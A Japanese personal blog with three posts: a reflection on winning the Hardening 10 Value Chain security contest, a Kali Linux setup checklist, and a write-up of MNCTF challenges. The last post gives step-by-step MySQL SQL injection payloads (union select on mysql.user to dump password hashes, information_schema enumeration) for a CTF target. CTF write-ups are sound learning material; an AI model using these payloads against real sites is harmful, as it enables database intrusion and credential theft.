Hatena::ブログ(Diary)

赤い何か(仮)

2015-11-10 Hardening 10 Value Chainに参加して

[][]Hardening 10 Value Chainに参加しました Hardening 10 Value Chainに参加しましたを含むブックマーク Hardening 10 Value Chainに参加しましたのブックマークコメント

この一週間は人生の中でも忘れる事ができない日々でした。

Hardening Value Chainでの優勝、MVP獲得は僕1人の力では到底達成できなかった成果です。

セキュリティエンジニアとして実務経験を持たない中で技術者としての高みにチャレンジしたいと考え参加したHardening。しかし、実際は一切手を動かす事はしませんでした。

初めから最後まで一切席に座る事なく、立ちっぱなしでチーム全体の把握に努め、チームとしての問題が発生していないかに目を見張り、小さな火種が見つかったらなるべく早く消す。やった事はそれだけです。

みんなで優勝するぞっ!と当日の朝にブースで集合写真を撮りました。目的に向かって頑張る空気を作る。やった事はそれだけです。

それに応えてくれた最高のチームメンバー。おそらく、2度と全員同じチームでプレイする事ない砂上の楼閣チーム。この文を書いていると目頭が熱くなりました。全員が楽しめた事が僕の最大の成果です。

願いが叶うなら、もう一度全員で集まりお酒を飲み交わしたいです。素晴らしいチームメイト。初めからチームメイトとして参加して頂いたマーケットプレイスの方。短い時間ですがご協力頂いたDBチューニングガチャ景品の方にも感謝です。

本当にみなさん、ありがとうございました。

また、貴重な経験を得る機会を作って頂いた運営の方々、イベントを支えて頂いてるスポンサーの方々、そして、色々な出来事トリガーとなったOwasp Nightとかめっしーに感謝です。

もし、僕がこのイベントに参加できていなかったら、それは僕の人生における最大の損失だったと思います

一生に一度の経験ができる。それがHardening!!技術を使わなくても大活躍できるセキュリティコンテスト、それがHardening!!

[]Softening Softeningを含むブックマーク Softeningのブックマークコメント

HardeningはSofteningとセットです。翌日発表ということで非常にタイトな時間の中、夜中の3時までかかって作成した資料です。てぽさん、やくもさんありがとう

15分の発表ということで詳細の解説は一切しませんでした。書ききれない事も山ほどありました。

資料はこちらです。発表の場を作ってもらえれば、お話に行きますよー!

https://docs.google.com/presentation/d/1II98gQNCauArPEumK8IZE804Plu126GNdA7GqJ1bFG4/edit?usp=sharing

[]賞品 賞品を含むブックマーク 賞品のブックマークコメント

優勝チームへの賞品の中に商品券がありましたが、「沖縄県ないでしか利用不可」というものでした。気が付かずに帰国便に乗ると大変なことになります最後最後まで油断する事ができません。運営マジでドSです。しかし、うちのチームはぬかりなく「全員」がこのトラップ回避してます

他にもとっても行きたかったPacsecチケットを頂きました。とても読みたかった隊長の本を合計2冊頂きました。ありがとうございます感謝

2015-07-29 Kaliの設定についていろいろ このエントリーを含むブックマーク このエントリーのブックマークコメント

8月になれば2がでるのだけど、今更1.1のセットアップ

1. レポジトリ修正

leafpad /etc/apt/sources.list

## Regular repositories

deb http://http.kali.org/kali kali main non-free contrib

deb http://security.kali.org/kali-security kali/updates main contrib non-free

## Source repositories

deb-src http://http.kali.org/kali kali main non-free contrib

deb-src http://security.kali.org/kali-security kali/updates main contrib non-free

2. 日本語入力

$ apt-get update

$ apt-get install ibus-anthy

「Applications」→「System tools」→「Preferences」→「IBus Preferences」を選択、

Input Method」のタブを開いて、「Select an input method」で「Japanese」を選択し、「Add

3. 全部更新

apt-get clean && apt-get update && apt-get upgrade -y && apt-get dist-upgrade -y

4. アーカイブマネージャー

apt-get install unrar unace rar unrar p7zip zip unzip p7zip-full p7zip-rar file-roller -y

5. デバイスエラーの修復

leafpad /etc/NetworkManager/NetworkManager.conf

managed=true

falseをtrueに変更

6.pedaを入れる

git clone https://github.com/longld/peda.git ~/peda

echo "source ~/peda/peda.py" >> ~/.gdbinit

echo "DONE! debug your program with gdb and enjoy"

7.ブラウザをお好みに変更

apt-get remove iceweasel

8. radare2を最新でいれる

git clone https://github.com/radare/radare2 ~/radare2

sys/install.sh


X.お好みでPPAとかgdebi いれる

X.音を出す

apt-get install alsa-utils -y

できないねぇ

2015-07-15 MNCTFの続き このエントリーを含むブックマーク このエントリーのブックマークコメント

解けなかった問題たちを解いてみました。

昇進試験

クロスワードパズルです。結構歯ごたえがあり、30分くらいかかりました。

ちなみにかなりの良問です。psrとか便利なコマンド何気なく紹介されているのがグッド!

解凍はあの人のお父さんの名前です。本人の名前をいれてもだめです。

f:id:yumano:20150715211317p:image

・内部犯行

ホワイトスペースを表示できるテキストエディタがあると楽です。

ShonoCryptorを起動して、パスワードを変更しながら簡単な文字列暗号化してみましょう。

後ろの10行がパスワード暗号自体は実際には暗号もかかってなく単に変換されているだけです。

脆弱会社

SQLインジェクションは下記を参考にポチポチとやりましょう

http://pentestmonkey.net/cheat-sheet/sql-injection/mysql-sql-injection-cheat-sheet

商品検索のページにSQLインジェクションがあります

' and 1=1#

次に

' order by n#

で、列数がいくつあるかを調べます

' order by 4#

エラーがでるので3行ですね。

' union select 1,2,3 #

とやると2,3のみが表示されますmysqlと決め打ちでmysql.userをチェックします

' union select 1, User,Password from mysql.user#

でテシガワラくんのパスワードハッシュが表示されます

答えは平文パスワードなので、JohntheRipperもしくはGoogleで解けます

ちゃんとやるとしたら・・・

' union SELECT 1,2,schema_name FROM information_schema.schemata;#

' union SELECT 1,table_schema, table_name FROM information_schema.columns;#

あたりでしっかりと調査するのがよいみたいです。